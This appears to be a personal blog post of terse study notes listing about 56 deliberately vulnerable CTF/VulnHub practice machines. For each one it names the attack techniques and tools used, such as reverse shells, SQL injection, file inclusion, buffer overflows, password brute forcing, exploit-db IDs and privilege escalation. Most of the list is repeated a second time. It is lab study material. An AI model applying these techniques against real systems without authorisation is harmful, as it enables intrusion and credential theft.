1. VM Cyberry: Port knocking, comments in HTML,Brainfuck code, Hydra for SSH, execute commands remotely using SSH, install ftp, openssl decrypt loop passing thru all supported ciphers, file command, command injection vulnerability and adding nc to a web request, head command, sudo access, shifting user from another using sudo, escaping restricted shell using awk, run shell using PHP -r, creating php page/script using echo, creating custom password dictionary based on hints,burp suite to get root access to the Admin panel, detail abt how to identify command injection vulnerability, installing backdoor, uer enumeration,unalias,base64 decode, QR code, buffer overflow but not complete, Port knocking to create all port combination
2. VM The Necromancer: 1: passive scan using tcpdump, victim connecting outbound, echo base64, connecting u666 port using nc, custom dictionary, gcc-multilib, executing an ELF type file, file, binwalk & exiftool commands, buffer overflow, hidden files or messages under bin files, pcap files, wireless pcap, aicrack,snmpset,snmpwalk hydra for ssh, cewl, readelf, adding beakpoint using gdb, metasploit for SNMP, wfuzz
3. VM: brainpan file filenam.exe, NC filename 9999, no gcc, strings, wine,SUID/SGID binaries and file permission misconfigurations, special permissions we can use with sudo, for look script showing number of packets being sent, using mona script and ASLR, 2nd buffer overflow to root, using gdb, find ,msfvenom reverseshell, 2nd buffer overflow to root, using gdb, full address space layout randomization
4. VM mr.Robot: Wordpress, Wscan brute force, sort/uniq pwd file, php revershell block, crack md5 pwd, search files with SUID bit set, use echo to decode pwd, extract username from VM wki site using cewl, use hydra to crack the pwd, use metasploit for reverse shell
5. VM: Vulnix : SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs, local bash shell from nfs, Putty(using rlogin service)
6. VM: pWnOS 2.0 Reading source page, Simple PHP Blog Perl exploit, Python revershell using oneliner, looking around , metasploit using PHP Blog exploit, burpsuite, sql porxy, sql injection, union set of commands, sqlmap read file and upload reverse shell using sqlmap
7. VM Skytower :3128 proxy, ssh filtered, chk vhost , php reverse filter via cli, directory traversal, ./bashrc file, proxychain, sql filters the 'OR' ||, burp to enuramte username, sql injection attack
8. VM - VulnOSv2 : Hidden details in the page, Drupal but couldnt exploit, sqlmap, kernel exploit, craft URL for SELECT with UNION statements
9. VM -PHP Include And Post Exploitation— Walkthrough: LFI, RFI, copy public key to victim, TCP redirection Fwding 443 to 22, uploading PHP file as PDF to get ability to run commands, php reverse shell
10. VM - XSS & MySQL : Union Based Injection, sql injection steps, CSS, grab cookie by hosting vulnerable code on kali with Kali and having CSS victim visit it
11. VMW - Droopy v0.2 Drupal, Metasploit, custom length password create custom rockyou kernel exploit, check email to get hint, brute force the truecrypt file install veracrpyt , PHP filter using MSFVENOM
12. VM - BTRSys: v2.1 Wordpress, PHP Reverse shell using theme, no gcc or python on victim
13. VM - Basic Pentest 1 csec. hidden wordpress vulnerability with default user/pwd , wordpress metasploit vulnerability, punixprivchecker /tells etc/passwd is writeable, wpscan, webshell phpbash
14. VMW - Sick0s1.2 use CURL. PUT option header to upload a reverse shell , Chkrootkit meta and searchsploit, dailycron job list and run cronjob manually
15. VMW - Kioptix 2014 comment on index.html, LFI, only allowed using specific useragent, metasploit, pChart 2.1.3, phptax, metasploit. getting core dumped while running privilege escalation, php reverse shell 26368 28718
16. VMW - Pwnlab : base64-encode, LFI, PHP reverse shell, temper data, Abusing users with ‘.’ in their PATH
17. VM : BSides-Vancouver-2018-Workshop. anonymous ftp, wordpress, hydra brute force for ftp, wpscan, msfconsole wp_admin_shell_upload, msfvenom python, wp-config.php, crontab, use hydra for brute force for http
18. VM: Lord of the Root 1.0.1 sqlmap, medusa, Tamper data intercept, privilege escalation, Burpsuite, Metasploit, MySQL Local Privilege Escalation UDF, getting a user sudo access from MYSQL, 1518.c mysql exploit, MySQL Local Privilege Escalation UDF but /tmp/setuid file is not present
19. VM 19 : Trollcave: 1.2 : stealing cookie but not working as expected. Getting info at the NC prompt but unable to reuse it to get admin web access, ruby on rails site/vulnerabilities, dir traversal, login with public key, exploiting vulnerability and adding public keys as authorized_keys in victims computer ,exploiting calculator application/program which is running as root, passing another set of commands as parameters to calc to chown and reverse shell, netcat without netcat,bash script to enumerate all users, linux/x64/meterpreter_reverse_tcp metasploit using an ELF based shell genereated from MSFVenom, Text walktru of B, wfuzz, enumeraing user and hashes using JSON but no productive outcome, not sure how the final exploit URL was created , exploit db we find the kernel has a known vulnerability 44298, compiled it on a 3rd machine, execute arbitrary commands as the king user, Privilege escalation with SUID binaries
20. VM: VulnOS: 2 opendocman, Drupal metaexploit didn't work, same as above. details in text/pix format, use python script instead of sqlmap to extract username and hash from DB, droopescan
21. VM : Pinky's Palace: v2 unable to get network working. Getting 127.0.0.1 IP address. this VM may only work in VM player
22. VM SmashTheTux: 1.0.1 : cant find walkthru
23. SickOS
24 Vulnserver: bufferoverflow python fuzzer script badchar
25 VM: IMF: [decode base64, combing base64 strings, Strcmp PHP documentation, SQLInjections error, SQLMap with --cookie, service listening on localhost only,ps -aux, /etc/init.d, /etc/knockd.conf, port knocking, “%s” injection, run ltrace command on agent, pattern_create.rb & pattern_offset.rb script from Metasploit, Getting offset, gdb buffer overflow, peda, Exploiting agent crashing, MSFVenom, bypassing CrappyWAF file type restriction, QR code, xxd , hidding php webshell to run cmd in gif, php revrese shell, netstat -antp, port knocking, file cmd, handling 32 bit file on 64bit kali during BOF, msfvenom -p,pattern_create.rb.pattern_offset.rb, arbitrary python code to create code for bof, logging with CURL CLI, SQL injection test, used curl instead of browser, objdump]
26. VM Toppo : login with the user/pwd provided at the vulnhub page to perform priv escalation, unable to get shell, rpcinfo, showmount, rpcbind, nfs
27. VM SecOS: 1 : capture admin cookie using 127.0.0.1 in a code test.html with cross site scripting vulnerability, CSRF attack, use exploit 37088 for priv escalation , Hacking Node.js and MangoDB, m, use wget to post data from CLI. Add other cmds to ping cmd using curl and wget, SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI
28 VM SecOS-1 : capture admin cookie using 127.0.0.1 in a code test.html with cross site scripting vulnerability, CSRF attack, use exploit 37088 for priv escalation, Hacking Node.js and MangoDB. use wget to post data from CLI. Add other cmds to ping cmd using curl and wget ,SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI
29 VM : SecTalks: BNE0x03 - Simple : PHP reverse shell , exploit 36746.c, 37088.c, 37292.c
30 VM Quaoar : wordpress, php reverse vulnerability, multiple open ports 22,53,80,110,139,143,445,993,995, pwd in wp-config
31 VM TopHatSec: Freshly: we don’t know the exact username and password therefore we have used SQLMAP for login form based injection for retrieving the database name and login credential by executing following command , metasploit msfvenom to create reverse shell, no gcc on target ,burp suite to gather parameters for SQLMAP, unshadow passwd and shadow file, john, root pwd from /var/www/html/login.php file ,see Burp Suite to interrupt the POST request and put the content in a file called
32 VM hackfest2016: Sedna : PUT method giving access forbidden, POSTER plugin renaming a file , exploit.html to POST a file for BuilderEngine 3.5.0 - Arbitrary File Upload vulnerability, netcat with netcat /dev/tcp, exploit 33899, command line reverse shell, firefart or exploit 40839 but I am getting error upon compilation ,metasploit , ditrycow
SUID 33 VM : Zorz . None of Walkthrus shows getting root access so may be it is not part of the to do. Walkthrus shows 3 different ways to get shell access. I got shell by uploading the revers shell file via index and browing to /upload1 folder. It shows upload3 but not upload1. upload3 doesnt allow anything except pictures but gif reverse shell or xxd didnt work either.
Tried to run exploit and run privchker and exploit checker but they didn't work. No gcc on server. No
34 VM The Wall 1. no open ports in initial portscan, tcpdump to listen traffic on the network, nc -nvlp 1337 to get the server connected after which additional ports enabled, long 74 character strinng that needed to be decoded using echo and xxd than mds5 unhash, Steganography using Steghide , sftp, ssh not allowed, file command, scalpel command, uncomment the jpg extension in the scalperl config file and ran it in an empty folder, fatcat which a forensics tool used for recovering / extracting data from FAT16 images
35 VM Droopy v0.2
36 VM :CTF_2017_online: javascript Obfuscated which is currently one of the best methods for protecting JavaScript code from reverse engineering. The "var _0xbb15=" gives us a hint . It’s in the obfuscated way. Deobfuscating using JS Beautifier, vulnerability with https: site, decode or reverse engineer the math manually, curl to download an html page using --data (POST) request, LFI or local file inclusion , curl to read /etc/passwd due to LFI,
wfuzz to fuzz/customize the dir structure to download, one can use wget to download the files from door and vault folders by selecting '--no-directories’ options so it doesn't create ten thousand directories but wget didnt stop automatically, it kept on going , may be does multiple iteration not sure ,aircrack-ng, looks like a blind sql injection and we are not getting response from the SQL injection error or select statement in that case we know the sql injection worked if we see output and when con content is shows means it is false or didn't work or doesnt exist , possible firewall blocking union based statements,
37 VM :LazysysAdmin
38 VM : d0not5top: 1.2 : burp proxy, adding hostnames to /etc/host, dirb localhost/domain but not working for me,use nc cmd to get the flag and echo cmd to decode the flag, wfuzz, virtualhost, partially binary string, google language translate, curl -header host request, additional domains, OWSAP ZAP, exiftool, HD, hash64,FUZZ
39 VM : HackDay: Albania : directory hopping using wfuzz, sql injection, sqlmap, file type restriction upload php reverse shell as jpg, msfvenom,meterpreter, no python 2.7 or gcc, password in config.php, mysql> prompt, outfile from mysql, writetable passwd file, adding a root user/pwd to passwd file, dirsearch, sqlmap time based blind attack, why username field is susceptible to attack while password field isnt ,port forward in our meterpreter session.
40 VM : Dina 1.0.1 zip2john, burp proxy change user agent vulnerability, php reverse shell
41. 41 VM : Billy Madison 1.0 : wordpress running on tcp 69,wpscan, Caesar Cipher tool based on with a rotation of 13,dirsearch, smbclient, sending email using swaks, aircrack , suid, running binary file as root and adding user to sudoer , smtpd port 2525, email to backdoor, mapping a shared folder smbclient, wireshark pcap follow TCP stream, dirbuster, hydra brute force ftp ,port knocking, dirb
42 VM : covfefe1 : to crack passphrase from SSH private key, mini buffer overflow, buf[20] adding /bin/bash after 20 character
43 VM : Milnet1 : error
44 VM : Defence Space CTF 2017 : PhpmyAdmin,ftp,http/s,default pwd,flag in certificate,ssh on 2225 port, crunch cmd ,reverse shell using python and SQL]
45 VM : CTF: Jarbas 1 : website linked to external website, jenkins, durb using -x option to search for html and php files, unhash pwd, run shell via jenkins web app, msfvenom code base64 encode/decode, privlege escalation adding user in sudo file by adding in sudoer file]
46 VM JIS-CTF: VulnUpload : dirb, info in source html, password in mysql.conf.d
47 VM Bob 1.0.1 VM:webshell, robotos.txt, reverse shell, combining two o/s commands using && and ||, hidden content/information, spawing a python shell, ssh on non default port, search for txt file, password in text file, gpg file where keys is first alphabets of the line of a file, burp suite, PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files not useful here
48 VM HTB Nineveh : Unable to test it since the VM had static IP. hydra brute force www, searchsploit php Lite Admin 1.9, hydra brute force https where username is irrevalant but just required to complete the command, php reverse shell, Create a database in phpLiteAdmin and table ,directory traversal , chkrootkit privilege escalation bug, port knocking, strings to extract key from png file
49 VM Rotating Fortress: 1.0.1 : Hard, unable to find much info via enum so I just read walkthru , change cookie to get admin web access, strings loki.bin which is an executuable, use debugger to look at the code to get the password, page shows numbers which looks like hex code of a message which will need to be decrypted, sed, tr, decrypt or deciper script , not sure how the author got to decrypt.sh from the message to create the key . not very clear, first & second key is positive while 3rd is negative why ?. script to generate the wordlist, wfuzz , port-knocking, reverse shell, sudo -l for priv escalation. xdbg64 is a 64 bit app which couldnt open loki.bin on a windows machine. Tried to open in Immunity debugger in Winodows which is 32bit app and wine Ollydbg in Kali which is 32 bit app as well. Was able to open the loki.bin in gcc and see the passwd but the screen output is different than what is lsited in walkthru A
50 VM MinU 1: wfuzz, WAF wafw00f - ModSecurity (OWASP CRS), way too many 403s, looks LFI but not it. It is remote command execution , looking at the /etc/passwd and ls -la using remote command execution with wildcards , tac - concatenate and print files in reverse, head - output the first part of files, rev - reverse lines characterwise , msfvenom, Privilege Escalation using json token, use online debugger to header and payload, Privilege Escalation using json token, JWT cracker
51. VM BlackMarket: 1: : cewl custom dict, sqlmap, online MD-5 decrypting tool, we decode above-enumerated hashes and found following,backdoor,password(in decimal format, need to be converted to hex and than to ASCII) in strings, illusion at this page you will get a hidden login form as declared in the encrypted mail. Still, if you have any confusion, please read the email from Dimitri one more time, everything will be cleared to you, burpsite.
52 VM DerpNStink: 1...wordpress, wpscan, wordpress vuln, access via mysql user/pwd hashcat, pwd in pcap file, sudo user will get you root access but the file/dir in sudo doesnt exist so you have to create one dev reverse tcp, use private key ssh to login
53 VM Basic Pentest 2..brute force passphrases for ssh login, convert private key to another format so we can use john to brute force key, use ssh2john to convert this SSH key into a crackable file for john the ripper.vim.basic have root permissions, that means that I could probably read the file in kay’s directory,
54 VM W1R3S: 1.0.1...local file inclusion, ftp, Cuppa CMS vulnerability , LFI working using CLI but not browser, john, sudo su for privilege esclation , I was getting the same response from server for LFI . looks like it needed encoding. "After a bit of research I found I may have better luck with encoded url (url encoding) params, so I utilised cURL"
55 VM Bulldog 1..passwowd hash in source, webshell with limited command but use || or && to run any command, crontab, python reverse shell for priv escalation, pwd in binary file extract it using strings file, read files from webshell, upgrade shell.
56 VM Fowsniff: 1 [imap and pop3 ports, access mailbox from cli, add python reverse shell to banner so when a user logs in , the banner runs and get root access, metasploit pop3 access]
2. VM The Necromancer: 1: passive scan using tcpdump, victim connecting outbound, echo base64, connecting u666 port using nc, custom dictionary, gcc-multilib, executing an ELF type file, file, binwalk & exiftool commands, buffer overflow, hidden files or messages under bin files, pcap files, wireless pcap, aicrack,snmpset,snmpwalk hydra for ssh, cewl, readelf, adding beakpoint using gdb, metasploit for SNMP, wfuzz
3. VM: brainpan file filenam.exe, NC filename 9999, no gcc, strings, wine,SUID/SGID binaries and file permission misconfigurations, special permissions we can use with sudo, for look script showing number of packets being sent, using mona script and ASLR, 2nd buffer overflow to root, using gdb, find ,msfvenom reverseshell, 2nd buffer overflow to root, using gdb, full address space layout randomization
4. VM mr.Robot: Wordpress, Wscan brute force, sort/uniq pwd file, php revershell block, crack md5 pwd, search files with SUID bit set, use echo to decode pwd, extract username from VM wki site using cewl, use hydra to crack the pwd, use metasploit for reverse shell
5. VM: Vulnix : SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs, local bash shell from nfs, Putty(using rlogin service)
6. VM: pWnOS 2.0 Reading source page, Simple PHP Blog Perl exploit, Python revershell using oneliner, looking around , metasploit using PHP Blog exploit, burpsuite, sql porxy, sql injection, union set of commands, sqlmap read file and upload reverse shell using sqlmap
7. VM Skytower :3128 proxy, ssh filtered, chk vhost , php reverse filter via cli, directory traversal, ./bashrc file, proxychain, sql filters the 'OR' ||, burp to enuramte username, sql injection attack
8. VM - VulnOSv2 : Hidden details in the page, Drupal but couldnt exploit, sqlmap, kernel exploit, craft URL for SELECT with UNION statements
9. VM -PHP Include And Post Exploitation— Walkthrough: LFI, RFI, copy public key to victim, TCP redirection Fwding 443 to 22, uploading PHP file as PDF to get ability to run commands, php reverse shell
10. VM - XSS & MySQL : Union Based Injection, sql injection steps, CSS, grab cookie by hosting vulnerable code on kali with Kali and having CSS victim visit it
11. VMW - Droopy v0.2 Drupal, Metasploit, custom length password create custom rockyou kernel exploit, check email to get hint, brute force the truecrypt file install veracrpyt , PHP filter using MSFVENOM
12. VM - BTRSys: v2.1 Wordpress, PHP Reverse shell using theme, no gcc or python on victim
13. VM - Basic Pentest 1 csec. hidden wordpress vulnerability with default user/pwd , wordpress metasploit vulnerability, punixprivchecker /tells etc/passwd is writeable, wpscan, webshell phpbash
14. VMW - Sick0s1.2 use CURL. PUT option header to upload a reverse shell , Chkrootkit meta and searchsploit, dailycron job list and run cronjob manually
15. VMW - Kioptix 2014 comment on index.html, LFI, only allowed using specific useragent, metasploit, pChart 2.1.3, phptax, metasploit. getting core dumped while running privilege escalation, php reverse shell 26368 28718
16. VMW - Pwnlab : base64-encode, LFI, PHP reverse shell, temper data, Abusing users with ‘.’ in their PATH
17. VM : BSides-Vancouver-2018-Workshop. anonymous ftp, wordpress, hydra brute force for ftp, wpscan, msfconsole wp_admin_shell_upload, msfvenom python, wp-config.php, crontab, use hydra for brute force for http
18. VM: Lord of the Root 1.0.1 sqlmap, medusa, Tamper data intercept, privilege escalation, Burpsuite, Metasploit, MySQL Local Privilege Escalation UDF, getting a user sudo access from MYSQL, 1518.c mysql exploit, MySQL Local Privilege Escalation UDF but /tmp/setuid file is not present
19. VM 19 : Trollcave: 1.2 : stealing cookie but not working as expected. Getting info at the NC prompt but unable to reuse it to get admin web access, ruby on rails site/vulnerabilities, dir traversal, login with public key, exploiting vulnerability and adding public keys as authorized_keys in victims computer ,exploiting calculator application/program which is running as root, passing another set of commands as parameters to calc to chown and reverse shell, netcat without netcat,bash script to enumerate all users, linux/x64/meterpreter_reverse_tcp metasploit using an ELF based shell genereated from MSFVenom, Text walktru of B, wfuzz, enumeraing user and hashes using JSON but no productive outcome, not sure how the final exploit URL was created , exploit db we find the kernel has a known vulnerability 44298, compiled it on a 3rd machine, execute arbitrary commands as the king user, Privilege escalation with SUID binaries
20. VM: VulnOS: 2 opendocman, Drupal metaexploit didn't work, same as above. details in text/pix format, use python script instead of sqlmap to extract username and hash from DB, droopescan
21. VM : Pinky's Palace: v2 unable to get network working. Getting 127.0.0.1 IP address. this VM may only work in VM player
22. VM SmashTheTux: 1.0.1 : cant find walkthru
23. SickOS
24 Vulnserver: bufferoverflow python fuzzer script badchar
25 VM: IMF: [decode base64, combing base64 strings, Strcmp PHP documentation, SQLInjections error, SQLMap with --cookie, service listening on localhost only,ps -aux, /etc/init.d, /etc/knockd.conf, port knocking, “%s” injection, run ltrace command on agent, pattern_create.rb & pattern_offset.rb script from Metasploit, Getting offset, gdb buffer overflow, peda, Exploiting agent crashing, MSFVenom, bypassing CrappyWAF file type restriction, QR code, xxd , hidding php webshell to run cmd in gif, php revrese shell, netstat -antp, port knocking, file cmd, handling 32 bit file on 64bit kali during BOF, msfvenom -p,pattern_create.rb.pattern_offset.rb, arbitrary python code to create code for bof, logging with CURL CLI, SQL injection test, used curl instead of browser, objdump]
26. VM Toppo : login with the user/pwd provided at the vulnhub page to perform priv escalation, unable to get shell, rpcinfo, showmount, rpcbind, nfs
27. VM SecOS: 1 : capture admin cookie using 127.0.0.1 in a code test.html with cross site scripting vulnerability, CSRF attack, use exploit 37088 for priv escalation , Hacking Node.js and MangoDB, m, use wget to post data from CLI. Add other cmds to ping cmd using curl and wget, SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI
28 VM SecOS-1 : capture admin cookie using 127.0.0.1 in a code test.html with cross site scripting vulnerability, CSRF attack, use exploit 37088 for priv escalation, Hacking Node.js and MangoDB. use wget to post data from CLI. Add other cmds to ping cmd using curl and wget ,SSH tunnel so we can access the ping site from Kali and dont have to pass via CLI
29 VM : SecTalks: BNE0x03 - Simple : PHP reverse shell , exploit 36746.c, 37088.c, 37292.c
30 VM Quaoar : wordpress, php reverse vulnerability, multiple open ports 22,53,80,110,139,143,445,993,995, pwd in wp-config
31 VM TopHatSec: Freshly: we don’t know the exact username and password therefore we have used SQLMAP for login form based injection for retrieving the database name and login credential by executing following command , metasploit msfvenom to create reverse shell, no gcc on target ,burp suite to gather parameters for SQLMAP, unshadow passwd and shadow file, john, root pwd from /var/www/html/login.php file ,see Burp Suite to interrupt the POST request and put the content in a file called
request.txt and run it with Sqlmap32 VM hackfest2016: Sedna : PUT method giving access forbidden, POSTER plugin renaming a file , exploit.html to POST a file for BuilderEngine 3.5.0 - Arbitrary File Upload vulnerability, netcat with netcat /dev/tcp, exploit 33899, command line reverse shell, firefart or exploit 40839 but I am getting error upon compilation ,metasploit , ditrycow
SUID 33 VM : Zorz . None of Walkthrus shows getting root access so may be it is not part of the to do. Walkthrus shows 3 different ways to get shell access. I got shell by uploading the revers shell file via index and browing to /upload1 folder. It shows upload3 but not upload1. upload3 doesnt allow anything except pictures but gif reverse shell or xxd didnt work either.
Tried to run exploit and run privchker and exploit checker but they didn't work. No gcc on server. No
34 VM The Wall 1. no open ports in initial portscan, tcpdump to listen traffic on the network, nc -nvlp 1337 to get the server connected after which additional ports enabled, long 74 character strinng that needed to be decoded using echo and xxd than mds5 unhash, Steganography using Steghide , sftp, ssh not allowed, file command, scalpel command, uncomment the jpg extension in the scalperl config file and ran it in an empty folder, fatcat which a forensics tool used for recovering / extracting data from FAT16 images
35 VM Droopy v0.2
36 VM :CTF_2017_online: javascript Obfuscated which is currently one of the best methods for protecting JavaScript code from reverse engineering. The "var _0xbb15=" gives us a hint . It’s in the obfuscated way. Deobfuscating using JS Beautifier, vulnerability with https: site, decode or reverse engineer the math manually, curl to download an html page using --data (POST) request, LFI or local file inclusion , curl to read /etc/passwd due to LFI,
wfuzz to fuzz/customize the dir structure to download, one can use wget to download the files from door and vault folders by selecting '--no-directories’ options so it doesn't create ten thousand directories but wget didnt stop automatically, it kept on going , may be does multiple iteration not sure ,aircrack-ng, looks like a blind sql injection and we are not getting response from the SQL injection error or select statement in that case we know the sql injection worked if we see output and when con content is shows means it is false or didn't work or doesnt exist , possible firewall blocking union based statements,
limit SQL function, SQL union queries, binwalk,exiftool37 VM :LazysysAdmin
38 VM : d0not5top: 1.2 : burp proxy, adding hostnames to /etc/host, dirb localhost/domain but not working for me,use nc cmd to get the flag and echo cmd to decode the flag, wfuzz, virtualhost, partially binary string, google language translate, curl -header host request, additional domains, OWSAP ZAP, exiftool, HD, hash64,FUZZ
39 VM : HackDay: Albania : directory hopping using wfuzz, sql injection, sqlmap, file type restriction upload php reverse shell as jpg, msfvenom,meterpreter, no python 2.7 or gcc, password in config.php, mysql> prompt, outfile from mysql, writetable passwd file, adding a root user/pwd to passwd file, dirsearch, sqlmap time based blind attack, why username field is susceptible to attack while password field isnt ,port forward in our meterpreter session.
40 VM : Dina 1.0.1 zip2john, burp proxy change user agent vulnerability, php reverse shell
41. 41 VM : Billy Madison 1.0 : wordpress running on tcp 69,wpscan, Caesar Cipher tool based on with a rotation of 13,dirsearch, smbclient, sending email using swaks, aircrack , suid, running binary file as root and adding user to sudoer , smtpd port 2525, email to backdoor, mapping a shared folder smbclient, wireshark pcap follow TCP stream, dirbuster, hydra brute force ftp ,port knocking, dirb
42 VM : covfefe1 : to crack passphrase from SSH private key, mini buffer overflow, buf[20] adding /bin/bash after 20 character
43 VM : Milnet1 : error
44 VM : Defence Space CTF 2017 : PhpmyAdmin,ftp,http/s,default pwd,flag in certificate,ssh on 2225 port, crunch cmd ,reverse shell using python and SQL]
45 VM : CTF: Jarbas 1 : website linked to external website, jenkins, durb using -x option to search for html and php files, unhash pwd, run shell via jenkins web app, msfvenom code base64 encode/decode, privlege escalation adding user in sudo file by adding in sudoer file]
46 VM JIS-CTF: VulnUpload : dirb, info in source html, password in mysql.conf.d
47 VM Bob 1.0.1 VM:webshell, robotos.txt, reverse shell, combining two o/s commands using && and ||, hidden content/information, spawing a python shell, ssh on non default port, search for txt file, password in text file, gpg file where keys is first alphabets of the line of a file, burp suite, PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files not useful here
48 VM HTB Nineveh : Unable to test it since the VM had static IP. hydra brute force www, searchsploit php Lite Admin 1.9, hydra brute force https where username is irrevalant but just required to complete the command, php reverse shell, Create a database in phpLiteAdmin and table ,directory traversal , chkrootkit privilege escalation bug, port knocking, strings to extract key from png file
49 VM Rotating Fortress: 1.0.1 : Hard, unable to find much info via enum so I just read walkthru , change cookie to get admin web access, strings loki.bin which is an executuable, use debugger to look at the code to get the password, page shows numbers which looks like hex code of a message which will need to be decrypted, sed, tr, decrypt or deciper script , not sure how the author got to decrypt.sh from the message to create the key . not very clear, first & second key is positive while 3rd is negative why ?. script to generate the wordlist, wfuzz , port-knocking, reverse shell, sudo -l for priv escalation. xdbg64 is a 64 bit app which couldnt open loki.bin on a windows machine. Tried to open in Immunity debugger in Winodows which is 32bit app and wine Ollydbg in Kali which is 32 bit app as well. Was able to open the loki.bin in gcc and see the passwd but the screen output is different than what is lsited in walkthru A
50 VM MinU 1: wfuzz, WAF wafw00f - ModSecurity (OWASP CRS), way too many 403s, looks LFI but not it. It is remote command execution , looking at the /etc/passwd and ls -la using remote command execution with wildcards , tac - concatenate and print files in reverse, head - output the first part of files, rev - reverse lines characterwise , msfvenom, Privilege Escalation using json token, use online debugger to header and payload, Privilege Escalation using json token, JWT cracker
51. VM BlackMarket: 1: : cewl custom dict, sqlmap, online MD-5 decrypting tool, we decode above-enumerated hashes and found following,backdoor,password(in decimal format, need to be converted to hex and than to ASCII) in strings, illusion at this page you will get a hidden login form as declared in the encrypted mail. Still, if you have any confusion, please read the email from Dimitri one more time, everything will be cleared to you, burpsite.
52 VM DerpNStink: 1...wordpress, wpscan, wordpress vuln, access via mysql user/pwd hashcat, pwd in pcap file, sudo user will get you root access but the file/dir in sudo doesnt exist so you have to create one dev reverse tcp, use private key ssh to login
53 VM Basic Pentest 2..brute force passphrases for ssh login, convert private key to another format so we can use john to brute force key, use ssh2john to convert this SSH key into a crackable file for john the ripper.vim.basic have root permissions, that means that I could probably read the file in kay’s directory,
54 VM W1R3S: 1.0.1...local file inclusion, ftp, Cuppa CMS vulnerability , LFI working using CLI but not browser, john, sudo su for privilege esclation , I was getting the same response from server for LFI . looks like it needed encoding. "After a bit of research I found I may have better luck with encoded url (url encoding) params, so I utilised cURL"
55 VM Bulldog 1..passwowd hash in source, webshell with limited command but use || or && to run any command, crontab, python reverse shell for priv escalation, pwd in binary file extract it using strings file, read files from webshell, upgrade shell.
56 VM Fowsniff: 1 [imap and pop3 ports, access mailbox from cli, add python reverse shell to banner so when a user logs in , the banner runs and get root access, metasploit pop3 access]
Comments
Post a Comment